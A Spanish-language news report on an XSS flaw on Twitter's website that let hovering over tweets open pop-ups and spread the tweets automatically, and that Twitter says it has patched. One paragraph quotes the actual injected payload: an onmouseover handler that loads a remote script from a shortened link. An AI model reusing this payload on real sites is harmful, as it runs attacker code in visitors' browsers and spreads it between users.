Un fallo de seguridad en la red social Twitter ha provocado hoy que miles de cuentas del servicio de microblogging redirijan a páginas de terceras partes o abran ventanas emergentes (pop-ups) hacia otras webs pornográficas y de juegos.

Según publica el servicio de microblogs en su página oficial, el ataque ya ha sido identificado y solucionado, sobre las 16.20 horas. "Hemos identificado y parcheado un ataque XSS y esperamos que esté totalmente desplegado en breve". 

Los usuarios tan sólo tenían que pasar el ratón por un enlace, sin necesidad de pinchar en él, para que sea abrieran dichas páginas.

La vulnerabilidad permitía, con la introducción de un código JavaScript ('onmouseover') en una URL tuiteada, que se generara un mensaje especial. Una vez que otro usuario pasa el ratón por encima del mensaje, éste se reenviaba automáticamente.

El virus podía detectarse por el siguiente enlace: https://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('https:u002fu002fis.gdu002ffl9A7'). Además, no era el único error: la web  mostraba también gráficos de gran tamaño o mensajes sin sentido repletos de códigos. Algunos mensajes eran meras manchas negras.

Afortunadamente, el bug o fallo de seguridad sólo afectó a la página web de Twitter. Los servicios de terceras partes, como Tweedeck o UberTwitter, se mantuvieron inmunes.

Como medida de preocupación se recomendó no abrir la página de Twitter hasta que el problema estuviera subsanado.

Precisamente la semana pasada Twitter se rediseñó con la intención de que sus usuarios permanezcan durante más tiempo en sus páginas, uno de los factores más perseguidos por los responsables de las redes sociales y que se asocia a las posibilidades publicitarias.